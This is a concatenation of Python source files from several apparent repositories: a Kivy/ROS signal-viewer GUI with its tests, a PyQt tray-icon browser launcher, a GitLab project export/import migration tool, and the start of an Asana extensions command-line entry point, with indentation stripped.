#Class for generating a generic save dialog
#to use it, create an instance of SaveDialog and override the cancel_callback and save_callback methods
save = ObjectProperty(None)
text_input = ObjectProperty(None)
cancel = ObjectProperty(None)
filechooser=ObjectProperty(None)
load = ObjectProperty(None)
cancel = ObjectProperty(None)
path = '.'
def __init__(self,path='.',**kwargs):
super(SaveDialog,self).__init__(**kwargs)
self.path=path
Clock.schedule_once(lambda dt: self.build(),0)
def build(self):
self.filechooser.path=self.path
self.filechooser.on_submit=self.on_submit_callback
def cancel_callback(self):
print("cancel")
def on_submit_callback(self,selection,touch):
self.path=selection[0]
self.save_callback(self.path)
def _save_callback(self):
if len(self.filechooser.selection) > 0:
self.path=self.filechooser.selection[0]
self.save_callback(self.path)
else:
self.save_callback(self.text_input.text)
def save_callback(self,path):
print(path)
class SelectDialog(FloatLayout):
select = ObjectProperty(None)
text_input = ObjectProperty(None)
cancel = ObjectProperty(None)
```
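As the comments above note, the dialogs are meant to be instantiated and have their `*_callback` hooks overridden, typically while hosted inside a Kivy `Popup`. A rough usage sketch, assuming the corresponding `.kv` rules for `LoadDialog` (with its `filechooser` id) exist elsewhere in the project:
```python
from kivy.uix.popup import Popup
from layout.filechoosing import LoadDialog  # module path as laid out in this repo

def show_load_dialog(start_path='.'):
    dialog = LoadDialog(path=start_path)
    popup = Popup(title='Open file', content=dialog, size_hint=(0.9, 0.9))

    def on_open(path):
        print('User picked:', path)
        popup.dismiss()

    # Override the hooks on the instance rather than subclassing.
    dialog.open_callback = on_open
    dialog.cancel_callback = popup.dismiss
    popup.open()
```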
#### File: SignalViewer/layout/mainlayout.py
```python
from roshandlers.rosconnector import ROSConnector
from kivy.properties import ObjectProperty
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from layout.toolbar import Toolbar
from layout.erisbar import ErisBar
from kivy.uix.popup import Popup
from kivy.clock import Clock
from threading import Thread
class MainLayout(GridLayout):
#fsm=ObjectProperty(FSM) #reference to fsm object inside the main layout
toolbar=ObjectProperty(Toolbar) #reference to toolbar object inside the main layout
ros=ROSConnector()
counter=0
popup=ObjectProperty(None)
event=None
def __init__(self,**kvargs):
super(MainLayout,self).__init__(**kvargs)
Clock.schedule_once(lambda dt: self.initROS(), 2)
self.popup=None
self.counter=0
def build(self):
print("MainLayout build")
def initROS(self):
t = Thread(target=self.ros.connect)
t.start()
self.event=Clock.schedule_interval(lambda dt: self.checkROS(), 1/10)
def checkROS(self):
if self.popup==None:
self.popup = Popup(title='Connecting to ROS',
content=Label(text='Attempting connection'),
size_hint=(None, None), size=(200, 200))
self.popup.open()
if not self.ros.isOK():
self.counter=self.counter+1;
if self.counter>5:
self.popup.content=Label(text='ERROR: verify ROS')
else:
if self.popup is not None:
self.popup.dismiss()
self.event.cancel()
```
#### File: SignalViewer/layout/optionsdialog.py
```python
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.modalview import ModalView
from kivy.uix.spinner import Spinner
from kivy.properties import ObjectProperty
from kivy.clock import Clock
#Convenience editing of dictionaries
from common.dict import getsemileafs_paths, getleaf_value, setleaf_value, isleaf
from kivy.uix.popup import Popup
from kivy.logger import Logger
posible_equations=('constant','scaleOnWeightEqn', 'scaleOnSpeedEqn', 'scaleAnkleStiffnessEqn','dampingEqn', 'scaleOnWeightEqn2Up', 'scaleOnWeightEqn2Down','previousValueEqn');
parameters=dict();
# Dictionary holding the possible equations
# and their parameters, types and default values.
parameters['constant']={};
parameters['scaleOnWeightEqn']={
'C': {'default':0,'type':'float'},
'initial_value': {'default':0,'type':'float'},
'final_value': {'default':0,'type':'float'},
'value': {'default':0, 'type': 'float'}
}
parameters['scaleOnWeightEqn2Up']={
'C': {'default':0,'type':'float'},
'initial_value': {'default':0,'type':'float'},
'final_value': {'default':0,'type':'float'},
'value': {'default':0, 'type': 'float'},
'initial_w': {'default':0, 'type': 'float'},
'final_w': {'default':0, 'type': 'float'}
}
parameters['scaleOnWeightEqn2Down']={
'C': {'default':0,'type':'float'},
'initial_value': {'default':0,'type':'float'},
'final_value': {'default':0,'type':'float'},
'value': {'default':0, 'type': 'float'},
'initial_w': {'default':0, 'type': 'float'},
'final_w': {'default':0, 'type': 'float'}
}
parameters['scaleOnSpeedEqn'] = {
'A': {'default':0.141, 'type':'float'},
'B': {'default':0.264, 'type':'float'}
}
parameters['scaleAnkleStiffnessEqn'] = {
}
parameters['dampingEqn'] = {
'P': {'default': 1, 'type': 'float'}
}
parameters['previousValueEqn'] = {
'param_name': {'default': '', 'type': 'string'}
}
class OptionsDialog(ModalView):
# A class for creating a modal view with the options for a parameter
# options contains a dictionary with the equation and all its possible parameters
semileaf_dict=None
title_lbl=ObjectProperty(Label)
paramsholder=ObjectProperty(BoxLayout)
def __init__(self,semileaf_path=None,semileaf_dict=None,**kwargs):
super(OptionsDialog,self).__init__(**kwargs)
self.semileaf_dict=semileaf_dict
self.semileaf_path=semileaf_path
Clock.schedule_once(lambda dt: self.build(), 0)
def build(self):
print("Options dialog build")
self.populate()
def populate(self):
#Construct the options menu from a ROSParams object
self.clear() # Start from fresh
if self.semileaf_dict is None:
return
#Fill the label
self.title_lbl.text="Options for "+"/".join(self.semileaf_path)
semileaf=self.semileaf_dict
#Create labels+textboxes
options=semileaf['options']
equation=options['equation']
boxLayout=BoxLayout(orientation='horizontal')
boxLayout.add_widget(Label(text='equation:'))
spinner=Spinner(text=equation,values=posible_equations)
spinner.bind(text=self.spinner_callback)
boxLayout.add_widget(spinner)
self.paramsholder.add_widget(boxLayout)
#Add parameter
for parameter in options.keys():
if not parameter=='equation':
boxLayout=BoxLayout(orientation='horizontal')
boxLayout.add_widget(Label(text=parameter+':'))
newTextInput=TextInput(text=str(options[parameter]))
isfloat=False
if not equation in parameters:
#ERROR this equation is not supported default parameters to float
Logger.info('Equation not supported')
isfloat=True
else:
if parameters[equation][parameter]['type']=='float':
isfloat=True
newTextInput.bind(text=self.on_text_callback_generator(parameter,isfloat))
boxLayout.add_widget(newTextInput)
self.paramsholder.add_widget(boxLayout)
def spinner_callback(self,spinner,text):
print("selected eq:"+text)
if text in posible_equations:
# Change dictionary values for the defaults corresponding to
# this equation's parameters
new_options=dict()
new_options['equation']=text
eq_parameters=parameters[text]
if type(eq_parameters) is dict:
for parameter in eq_parameters.keys():
param=eq_parameters[parameter]
new_options[parameter]=param['default']
print("\t%s"%new_options)
self.semileaf_dict['options']=new_options
self.populate()
def on_text_callback_generator(self,key,isfloat):
#This function helps to create a callback function for each text input
# modifying the appropriate key of the dictionary
return lambda instance,value : self.change_paramvalue(key,value,isfloat)
def change_paramvalue(self,param_key,value,isfloat=True):
#Change the value for a key
param_dict=self.semileaf_dict
options=param_dict['options']
#value always comes as a string
if isfloat:
try:
value=float(value)
except:
pass
options[param_key]=value
def clear(self):
self.paramsholder.clear_widgets()
```
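The `on_text_callback_generator` helper above exists to freeze the current `key` for each `TextInput`; binding a lambda that refers to the loop variable directly would leave every field writing to the last key, because Python closures capture variables late. A tiny illustration of the difference, independent of Kivy:
```python
options = {'C': 0.0, 'initial_value': 0.0, 'final_value': 0.0}

# Broken: every callback ends up seeing the final value of `key`.
broken = [lambda value: options.__setitem__(key, value) for key in options]

# Correct: a factory function captures `key` per callback, as in
# OptionsDialog.on_text_callback_generator().
def make_callback(key):
    return lambda value: options.__setitem__(key, value)

fixed = [make_callback(key) for key in options]
fixed[0](1.5)   # updates 'C'
fixed[2](9.9)   # updates 'final_value'
print(options)  # {'C': 1.5, 'initial_value': 0.0, 'final_value': 9.9}
```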
#### File: SignalViewer/roshandlers/params.py
```python
import rospy
from rospy import ROSException
import warnings
#from common.dict import getleafs_paths
#API functions for setting and getting parameters
#rospy.set_param(param_name,param_value)
#rospy.get_param(param_name, default=<rospy.client._Unspecified object>)
#For multiple parameters
#{'x':1,'y':2,'sub':{'z':3}}
#will set param_name/x=1, param_name/y=2, and param_name/sub/z=3. Furthermore, it will replace all existing parameters in the param_name namespace with the parameters in param_value. You must set parameters individually if you wish to perform a union update.
# Class for managing parameters from and to the rosparam server
# an instance reads a param name (it need not be a leaf parameter, i.e. it can be a dictionary of parameters)
# for example, you can create the object:
# param1=ROSParam('/EarlyStance/Knee/')
# Then, the param1 object has a dictionary for all the parameters under '/EarlyStance/Knee'
# If there are no parameters in the param server the dictionary is empty.
# You can modify the dictionary to change the parameter values and when done you can upload the parameters to the parameter server
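# A short illustrative sketch (hypothetical parameter names and values):
#   knee = ROSParam('/EarlyStance/Knee')
#   knee.dictionary['k'] = 250      # edit the local copy
#   knee.upload()                   # push the whole namespace back to rosmaster
#   knee.download()                 # refresh the local copy from rosmaster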
class ROSParam(object):
def __init__(self,name):
self.name=name
self.download()
def set(self, param_name,param_value):
# set a parameter directly in the parameter server
return rospy.set_param(param_name,param_value)
def get(self, name):
# get a parameter directly from the parameter server
try:
return rospy.get_param(name)
except ROSException:
warnings.warn("ROSException")
except KeyError:
warnings.warn("%s: parameter does not exist in rosmaster"%name)
return []
def upload(self):
# upload the parameters stored in this instance to rosmaster
return rospy.set_param(self.name,self.dictionary)
def download(self):
#download the parameters from rosmaster to the dictionary in this instance
try:
self.dictionary=rospy.get_param(self.name)
except ROSException:
warnings.warn("ROSException")
except KeyError:
warnings.warn("%s: parameter does not exist in rosmaster"%self.name)
self.dictionary=[]
```
#### File: SignalViewer/signalslayout/autoselector.py
```python
from customwidgets.text import TextWidget
from customwidgets.plot import PlotWidget
def WidgetSelect(topic_type):
#returns the default plot type for a certain topic type
selections={
'custom_msgs/FsmState' : TextWidget
}
return selections.get(topic_type,PlotWidget)
def AutoSelect(topic_name):
#returns whether or not a topic name should be selected automatically in the
selections={
'/fsm/State' : False,
'/ankle/joint_state' : True,
'/knee/joint_state' : True,
'/loadcell/wrench' : True
}
return selections.get(topic_name,False)
```
#### File: SignalViewer/signalslayout/signaldisplay.py
```python
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.uix.checkbox import CheckBox
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from threading import Thread
from customwidgets.text import TextWidget
from customwidgets.plot import PlotWidget
from subscribers.subscriber import Subscriber
class SignalDisplay(GridLayout):
plots_dict={} #Dictionary of current plots in the display
topics_dict={} #Local access to the dictionary of all available topics
viewer_ref=ObjectProperty(None)
display_ref=ObjectProperty(None)
def __init__(self,**kwargs):
super(SignalDisplay,self).__init__(**kwargs)
def setreferences(self,viewer,selector):
self.viewer_ref=viewer
self.selector_ref=selector
def build(self,topics_dict=None):
if topics_dict is not None:
self.topics_dict=topics_dict
else:
self.topics_dict=self.viewer_ref.topics_dict
def add(self,topic_name,widget_class=TextWidget):
#add a widget for the topic
subs=self.topics_dict[topic_name]['subs']
#Get subscriber channels:
channels=subs.getChannels()
newplot=widget_class(channels=channels,title=topic_name)
newGridElement=GridLayout(cols=1,rows=1)
newGridElement.add_widget(newplot)
self.add_widget(newGridElement)
self.plots_dict[topic_name]=newplot
def remove(self,topic_name):
#remove the plot for the corresponding topic
plot=self.plots_dict[topic_name]
parentContainer=plot.parent
parentContainer.parent.remove_widget(parentContainer)
self.plots_dict.pop(topic_name)
def update(self):
for key in self.plots_dict:
sub=self.topics_dict[key]['subs']
plot=self.plots_dict[key]
try:
data=sub.getQueue()
except Exception:
print('Error')
data = []
#print(data)
if data:
plot.update(data)
pass
```
#### File: tests/common/dictionary_leafs.py
```python
import sys
sys.path.append('../..')
from common.dict import getleafs_paths , getleaf_value, setleaf_value
def main(**args):
dictionary={'ankle': {'k': 200, 'b': 15, 'theta_eq': 0}, 'knee': {'k': 172, 'b': 0, 'theta_eq': 0}}
print("Dictionary: %s"%dictionary)
a=getleafs_paths(dictionary)
print("Leafs:%s"%a)
leaf_i=1
print("Value for leaf %s : %s"%(a[leaf_i],getleaf_value(dictionary,a[leaf_i])))
setleaf_value(dictionary,a[leaf_i],18.5)
print("New Dictionary: %s"%dictionary)
if __name__=="__main__":
main()
```
#### File: tests/filter_bar/filter_bar.py
```python
import sys
sys.path.append('..')
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import ObjectProperty, BooleanProperty, StringProperty
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.textinput import TextInput
class InputLayout(BoxLayout):
#Widget for showing the value of a float variable
input = ObjectProperty(TextInput)
def __init__(self, **kvargs):
super(InputLayout, self).__init__(**kvargs)
Clock.schedule_once(lambda dt: self.build(), 0)
def build(self):
print("build")
self.input.bind(text=self.parent.on_input_callback)
def update(self, dt):
text = str(self.subs1.data)
self.xlabel.setText(text)
class guiLayout(BoxLayout):
#Root widget or layout for the GUI
floatwidget = ObjectProperty(None)
def __init__(self, **kvargs):
super(guiLayout, self).__init__(orientation='vertical')
self.all_names = [
'name/othername/aname', 'name/othername/aname',
'name/othername/bname', 'name/othername/cname',
'name/thisothername/aname', 'nameZ/othername/aname',
'nameZ/othername/aname'
]
Clock.schedule_once(lambda dt: self.build(self.all_names), 0)
def build(self, names_list):
self.clear_labels()
for i, name in enumerate(names_list):
#create labels
print(name)
self.grid.add_widget(Label(text=name))
def clear_labels(self):
#Delete all labels in the widget
self.grid.clear_widgets()
def on_input_callback(self, instance, value):
print(value)
# TO DO #
# This is where the filter does the work#
new_names = filter(lambda x: value in x, self.all_names)
self.build(new_names)
# TO DO #
# use the filter output to generate a new (filtered) names_list
# -> name_list=something
# Draw the gui again
# self.build(names_list)
class filter_barApp(App):
gui = ObjectProperty(BoxLayout)
def build(self):
self.gui = guiLayout()
return self.gui
def on_start(self):
pass
def on_pause(self):
#To do: save your work here resume is not guaranteed
pass
def on_resume(self):
#To do: app is back alive
pass
if __name__ == '__main__':
filter_barApp().run()
```
#### File: SignalViewer/tests/GUI_plot.py
```python
import sys
sys.path.append('..')
import rospy
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import ObjectProperty, BooleanProperty, StringProperty
from rospy import ROSInitException
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from subscribers.std_msgs_sub import Float32Subscriber
import threading
class Xlabel(Widget):
value=StringProperty("")
def setText(self,text):
self.value=text;
def ROSConnect():
ros_ok=False
try:
print("Connecting to rosmaster")
rospy.init_node('listener', anonymous=True)
ros_ok=True
except ROSInitException:
print("Could not initialize ros node")
ros_ok=False
finally:
pass
return ros_ok
class ROSWidget(Widget):
#ROS connection
ros_ok=BooleanProperty(False)
error_popup = ObjectProperty(Popup)
def a_task(self):
for i in range(0,100000):
print("hola %s" % i)
def __init__(self,**kvargs):
super(ROSWidget,self).__init__(**kvargs)
#Do this in a new thread
ROSConnect()
class FloatWidget(Widget):
#Widget for showing the value of a float variable
xlabel = ObjectProperty(None)
subs1 = ObjectProperty(None)
def __init__(self,**kvargs):
super(FloatWidget,self).__init__(**kvargs)
self.initialize()
def initialize(self):
self.subscribeAll()
Clock.schedule_interval(self.update, 1.0/60.0)
def subscribeAll(self):
self.subs1=Float32Subscriber("/x")
def update(self, dt):
text=str(self.subs1.data)
self.xlabel.setText(text)
class guiLayout(BoxLayout):
#Root widget or layout for the GUI
floatwidget=ObjectProperty(None)
def __init__(self,**kvargs):
super(guiLayout,self).__init__(orientation='vertical')
class guiApp(App):
gui=ObjectProperty(BoxLayout)
def build(self):
self.gui = guiLayout()
return self.gui
def on_start(self):
pass
def on_pause(self):
#To do: save your work here resume is not guaranteed
pass
def on_resume(self):
#To do: app is back alive
pass
if __name__ == '__main__':
guiApp().run()
```
#### File: tests/ros_interaction/rosparam_test.py
```python
import sys
sys.path.append('../..')
import rospy
import warnings
import signal, sys, time
from roshandlers.params import ROSParam
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
sys.exit(0)
def main():
print "START TEST"
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C to end')
#Launch ros node
rospy.init_node('listener', anonymous=True)
param1=ROSParam('/test/param1')
if param1.value == []:
print("parameter is not set in server")
else:
print("parameter: %s , value: %s"%(param1.name,param1.value))
# Modify the value of the parameter
param1.value=5;
param1.upload()
#At this point you can check with rosparam list / rosparam get in terminal
while True:
# While this infinite loop is running you can open a terminal and modify
# the value in the param server (e.g. rosparam set /test/param1 10.4)
# the value should refresh accordingly in the print parameter line
print("Hi!")
param1.download()
if param1.value == []:
print("parameter is not set in server")
else:
print("parameter: %s , value: %s"%(param1.name,param1.value))
time.sleep(5)
if __name__ == "__main__":
main()
```
#### File: tests/visual_elements/hello_world.py
```python
from kivy.app import App
from kivy.uix.label import Label
from kivy.logger import Logger
import warnings
class TestApp(App):
def build(self):
warnings.warn("this is a warning")
Logger.warning("this is a warning in kivy")
Logger.info('title: This is a info message.')
Logger.debug('title: This is a debug message.')
return Label(text="hi there")
TestApp().run()
``` |
{
"source": "jonathancardoso/dev-tests",
"score": 2
} |
#### File: dev-tests/test002/browser.py
```python
import sys
from PyQt4 import QtGui, QtCore
from PySide.QtGui import QApplication
from PySide.QtCore import QUrl
from PySide.QtWebKit import QWebView
class SystemTrayIcon(QtGui.QSystemTrayIcon):
def __init__(self, icon, parent=None):
QtGui.QSystemTrayIcon.__init__(self, icon, parent)
menu = QtGui.QMenu(parent)
exitAction = menu.addAction("Exit")
self.setContextMenu(menu)
QtCore.QObject.connect(exitAction,QtCore.SIGNAL('triggered()'), self.exit)
def exit(self):
QtCore.QCoreApplication.exit()
def main():
app = QtGui.QApplication(sys.argv)
browser = QWebView()
browser.setWindowTitle('CreativeDrive Brazil')
browser.setUrl(QUrl('http://127.0.0.1:5000'))
browser.showMaximized()
w = QtGui.QWidget()
trayIcon = SystemTrayIcon(QtGui.QIcon("static/images/ico.png"), w)
trayIcon.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
``` |
{
"source": "jonathancarroll/gitlab-migrate",
"score": 3
} |
#### File: gitlab-migrate/gitlab_migrate/config.py
```python
import yaml
def load(config_file):
with open(config_file) as f:
config = yaml.load(f, Loader=yaml.FullLoader)
return Config(**config)
class Config(object):
__slots__ = ['servers', 'migrate']
def __init__(self, servers, migrate):
self.servers = {name: Server(config) for name, config in servers.items()}
self.migrate = Migrate(**migrate)
class Server(object):
__slots__ = ['url', 'auth_token', 'api_version', 'group', 'ssl_verify']
def __init__(self, server):
self.url = server['url']
self.auth_token = server['auth_token']
self.api_version = server['api_version'] if 'api_version' in server else 4
self.group = server['group'] if 'group' in server else None
self.ssl_verify = server['ssl_verify'] if 'ssl_verify' in server else True
class Migrate(object):
__slots__ = ['groups', 'user']
def __init__(self, groups=None, user=None):
self.groups = groups if groups is not None else {}
self.user = user
```
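`load()` simply unpacks the parsed YAML into `Config`, so the file needs a `servers` mapping and a `migrate` mapping. A hedged sketch of an equivalent structure built directly as a Python dict; all URLs, tokens and group names below are placeholders, and the per-group `projects`/`destination` keys follow how `migration_instructions()` in migrate.py consumes them:
```python
from gitlab_migrate.config import Config

# Hypothetical contents equivalent to a parsed config.yml (placeholders only).
parsed = {
    'servers': {
        'source': {'url': 'https://gitlab.example.org',
                   'auth_token': 'SOURCE-TOKEN', 'ssl_verify': True},
        'destination': {'url': 'https://gitlab.example.com',
                        'auth_token': 'DEST-TOKEN'},
    },
    'migrate': {
        'groups': {
            'my-old-group': {
                'projects': '--all--',        # or an explicit list of names
                'destination': 'new-group',
            },
        },
        'user': {'projects': ['personal-project']},
    },
}

config = Config(**parsed)
print(config.servers['source'].url, config.migrate.groups)
```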
#### File: gitlab-migrate/gitlab_migrate/connection.py
```python
import gitlab
import os
import time
def connect(gitlab_instance, gitlab_token, api_version=4, ssl_verify=True):
GL_CONN = gitlab.Gitlab(
gitlab_instance, private_token=gitlab_token, api_version=api_version, ssl_verify=ssl_verify
)
GL_CONN.auth()
return GL_CONN
def _projects_from_group(connection, group, statistics=True):
gl = connection
projects = []
results = gl.groups.list(search=group, statistics=statistics, include_subgroups=True)
if len(results) > 1:
groups = [(g.id, g.name) for g in results]
msg = 'Found more than one group matching "{}" [{}] - trying to resolve'.format(group, groups)
print(msg)
# mimic exact search
exact_match = None
for g in results:
if g.name == group:
exact_match = [g]
break
results = exact_match
if not results:
msg = 'Unable to find group matching "{}" - aborting'.format(group)
raise NameError(msg)
gl_group = results[0]
# this never gives statistics
projects_tmp = gl_group.projects.list(all=True, include_subgroups=True)
# for each project, download full info
for p in projects_tmp:
projects.append(gl.projects.get(p.id, statistics=statistics))
return projects
def _project_by_name(connection, name, statistics=True):
gl = connection
results = gl.projects.list(search=name, statistics=statistics)
if len(results) > 1:
print('Found more than one project matching "{}" - aborting'.format(name))
return 1
return results[0]
def projects(connection, names=None, groups=None, statistics=True):
gl = connection
results = []
if groups is not None and not isinstance(groups, (list, tuple)):
groups = [groups]
if groups:
for g in groups:
results += _projects_from_group(gl, g, statistics)
if names:
results = list(filter(lambda x: x.name in names, results))
else:
if names:
results = [_project_by_name(gl, name, statistics) for name in names]
else:
results = gl.projects.list(all=True, statistics=statistics)
return results
def user_projects(connection, names=None, statistics=True):
current_user = connection.users.get(connection.user.id)
projects_tmp = current_user.projects.list(statistics=statistics)
projects = []
for p in projects_tmp:
projects.append(connection.projects.get(p.id, statistics=statistics))
if names:
projects = list(filter(lambda x: x.name in names, projects))
return projects
def export_project(project):
print('Starting export process for project', project.name)
export_file = '/tmp/{}.tgz'.format(project.name)
if os.path.exists(export_file):
print('Export file for project {} already exists: {}'.format(project.name, export_file))
return export_file
export = project.exports.create({})
export.refresh()
while export.export_status != 'finished':
time.sleep(1)
export.refresh()
with open(export_file, 'wb') as f:
export.download(streamed=True, action=f.write)
return export_file
def find_group(connection, group, statistics=False):
if '/' in group:
tokens = group.split('/')
current_group = None
base_group = None
for search_for in tokens:
if current_group is None:
current_group = connection.groups.list(
search=search_for, statistics=statistics, include_subgroups=True
)[0]
base_group = current_group
else:
current_group = base_group.subgroups.list(
search=search_for, statistics=statistics, include_subgroups=True
)[0]
base_group = connection.groups.get(current_group.id)
# full API access only through groups.get
current_group = connection.groups.get(current_group.id)
return current_group
else:
current_group = connection.groups.list(search=group, statistics=statistics)[0]
return current_group
def import_project(connection, project, destination):
# print(dir(destination))
# return
export_file = export_project(project)
print('Importing', project.name, 'to', destination.name)
# new_project = connection.projects.create({'name':project.name, 'namespace_id': destination.id})
try:
with open(export_file, 'rb') as f:
output = None
if type(destination).__name__ == 'User':
output = connection.projects.import_project(f, path=project.path, override=True)
else:
output = connection.projects.import_project(
f, path=project.path, namespace=destination.id, overwrite=True,
)
print(' >>>> Import in progress')
project_import = connection.projects.get(output['id'], lazy=True).imports.get()
while project_import.import_status not in ['finished', 'failed']:
print(project_import.import_status)
time.sleep(10)
project_import.refresh()
if project_import.import_status == 'failed':
# TODO: remove failed project
print('Unable to import project:', project_import.import_error)
except gitlab.exceptions.GitlabHttpError as e:
print(' >>>> Unable to import project', project.name, ':', e)
return False
return True
```
#### File: gitlab-migrate/gitlab_migrate/migrate.py
```python
import click
import sys
from . import __version__
from . import config as cfg
from . import connection as glc
def print_version(plain):
if plain:
click.echo(__version__)
else:
click.echo("gitlab-migrate version: {}".format(__version__))
def migration_instructions(conn_src, conn_dst, migrate):
instructions = []
user_projects = []
groups = migrate.groups
user = migrate.user
for group, content in groups.items():
names = None
if content['projects'] != '--all--':
names = content['projects']
projects = glc.projects(conn_src, names=names, groups=[group], statistics=False)
search_for = content['destination']
destination = glc.find_group(conn_dst, search_for)
if not destination:
print('Unable to find destination "{}" - aborting'.format(search_for))
return instructions, user_projects
for project in projects:
instructions.append((project, destination))
if user:
names = None
if user['projects'] != '--all--':
names = user['projects']
user_projects = glc.user_projects(conn_src, names=names, statistics=False)
return instructions, user_projects
@click.command(help=__doc__)
@click.argument('config_file', type=click.Path(exists=True), required=False)
@click.option('--version', is_flag=True)
@click.option('--plain', is_flag=True)
@click.option('--noop', is_flag=True)
def cli(config_file, version, plain, noop):
if version:
print_version(plain)
return 0
config = cfg.load(config_file)
src_server = config.servers['source']
dst_server = config.servers['destination']
gl_src = glc.connect(src_server.url, src_server.auth_token, ssl_verify=src_server.ssl_verify)
gl_dst = glc.connect(dst_server.url, dst_server.auth_token, ssl_verify=src_server.ssl_verify)
group_instructions, user_instructions = migration_instructions(gl_src, gl_dst, config.migrate)
# print(group_instructions, user_instructions)
for project, destination in group_instructions:
print(' >> Going to migrate project {} to {}/{}/{}'.format(
project.name, dst_server.url, destination.name, project.name
)
)
if not noop:
print(' >>>> Importing project', project.name)
glc.import_project(gl_dst, project, destination)
dst_user = gl_dst.users.get(gl_dst.user.id)
for project in user_instructions:
print(' >> Going to migrate project {} to {}/{}'.format(
project.name, dst_server.url, gl_dst.user.username
)
)
if not noop:
print(' >>>> Importing project', project.name)
glc.import_project(gl_dst, project, dst_user)
# print(group_instructions, user_instructions)
# projects = glc.projects(gl, groups=groups, statistics=True)
# for project in projects:
# print(dir(project))
# break
# glc.export_project(project)
if not group_instructions and not user_instructions:
sys.exit(1)
if noop:
print('Running with "--noop" nothing to do!')
return
if click.confirm('Do you want to archive (mark as read-only, reversible) all exported projects?'):
print(' >> Archiving (marking as read-only) all exported projects')
for project, _ in group_instructions:
print('Archiving', project.name)
project.archive()
for project in user_instructions:
print('Archiving', project.name)
project.archive()
else:
print('All done!')
``` |
{
"source": "JonathanCasey/asana_extensions",
"score": 2
} |
#### File: asana_extensions/asana_extensions/main.py
```python
import argparse
import logging
import signal
import sys
from asana_extensions import version
from asana_extensions.general import config
from asana_extensions.rules import rules
_NAME_MOD_OVERRIDE = 'asana_extensions.main'
if __name__ == '__main__': # Ignored by CodeCov
# Since no unit testing here, code kept at absolute minimum
logger = logging.getLogger(_NAME_MOD_OVERRIDE)
else:
logger = logging.getLogger(__name__)
def main(force_test_report_only, log_level, modules):
"""
Launches the main app.
Args:
force_test_report_only (bool): True to force test report only mode; False
to allow full execution (pending other settings).
log_level (Level/int/str): The desired log level. This can be specified
as a level constant from the logging module, or it can be an int or str
representing the numeric value (possibly as a str) or textual name
(possibly with incorrect case) of the level.
modules ([str]): The list of module names of what to execute. See the
arg parsing code in `_setup_and_call_main()` for details of options.
"""
try:
_config_root_logger(log_level)
except (TypeError, ValueError) as ex:
_config_root_logger(logging.NOTSET)
logger.warning(f'Logger setting failed (Exception: {ex}). Defaulting'
+ ' to not set.')
any_errors = None
if modules and any(x.lower() in ['rules', 'all'] for x in modules):
any_errors = not _main_rules(force_test_report_only) \
or any_errors or False
if any_errors is None:
logger.info('Asana Extensions had no modules to run -- fully skipped.')
elif any_errors:
logger.warning('Asana Extensions run completed, but with errors...')
else:
logger.info('Asana Extensions run completed successfully!')
def _main_rules(force_test_report_only):
"""
The main function for execution the rules modules.
Args:
force_test_report_only (bool): True to force test report only mode; False
to allow full execution (pending other settings).
Return:
(bool): True if fully successful (even in test report only mode); False if
any errors occurred that partially or fully prevented completion.
"""
all_rules = rules.load_all_from_config()
return rules.execute_rules(all_rules, force_test_report_only)
def _config_root_logger(log_level):
"""
Configure the root logger.
Specifically, this sets the log level for the root logger so it will apply
to all loggers in this app.
Args:
log_level (Level/int/str): The desired log level. This can be specified
as a level constant from the logging module, or it can be an int or str
representing the numeric value (possibly as a str) or textual name
(possibly with incorrect case) of the level.
Raises:
(TypeError): Invalid type provided for `log_level`.
(ValueError): Correct type provided for `log_level`, but is not a valid
supported value.
"""
root_logger = logging.getLogger() # Root logger will config app-wide
handler_stdout = logging.StreamHandler(sys.stdout)
handler_stdout.setLevel(logging.NOTSET)
handler_stdout.addFilter(config.LevelFilter(max_inc_level=logging.INFO))
handler_stderr = logging.StreamHandler()
handler_stderr.setLevel(logging.WARNING)
root_logger.addHandler(handler_stdout)
root_logger.addHandler(handler_stderr)
formatter = logging.Formatter('<%(name)s> %(levelname)s: %(message)s')
handler_stdout.setFormatter(formatter)
handler_stderr.setFormatter(formatter)
str_value_error = None
try:
root_logger.setLevel(log_level.upper())
return
except AttributeError:
# Likely passed in an int, which has no method `upper()` -- retry below
pass
except ValueError as ex:
# ValueError is probably "unknown level" from logger, but might be an int given as a str
str_value_error = ex
try:
root_logger.setLevel(int(log_level))
return
except (TypeError, ValueError):
# Probably an invalid type that couldn't be cast -- let fall thru
pass
if str_value_error is not None:
raise str_value_error
raise TypeError('Invalid log level type (somehow). See --help for -l.')
def _setup_and_call_main(_args=None):
"""
Setup any pre-main operations, such as signals and input arg parsing, then
call `main()`. This is basically what would normally be in
`if __name__ == '__main__':` prior to `main()` call, but this allows unit
testing a lot more easily.
Args:
_args ([str] or None): The list of input args to parse. Should only be
used by unit testing. When executing, it is expected this stays as
`None` so it will default to taking args from `sys.argv` (i.e. from
CLI).
"""
_register_shutdown_signals()
parser = argparse.ArgumentParser(description='Process inputs.',
prog='asana_extensions')
parser.add_argument('-e', '--execute',
dest='force_test_report_only',
action='store_const',
const=False,
default=True,
help='Execute the module(s). Without this, it will run in test'
+ ' report only mode.')
parser.add_argument('-l', '--log-level',
default=logging.WARNING,
help='Set the log level through the app. Will only report logged'
+ ' messages that are the specified level or more severe.'
+ ' Defaults to "Warning". Can specify by name or number to'
+ ' match python `logging` module: notset/0, debug/10, info/20,'
+ ' warning/30, error/40, critical/50.')
parser.add_argument('-m', '--modules',
nargs='+',
help='The modules to run in this invocation. Required. Can'
+ ' specify "all" to run all modules. Otherwise, can provide a'
+ ' space-separated list of module names. Supported modules:'
+ ' rules.')
parser.add_argument('--version',
action='version',
version='%(prog)s ' + version.get_full_version_string(),
help='The version of this application/package.')
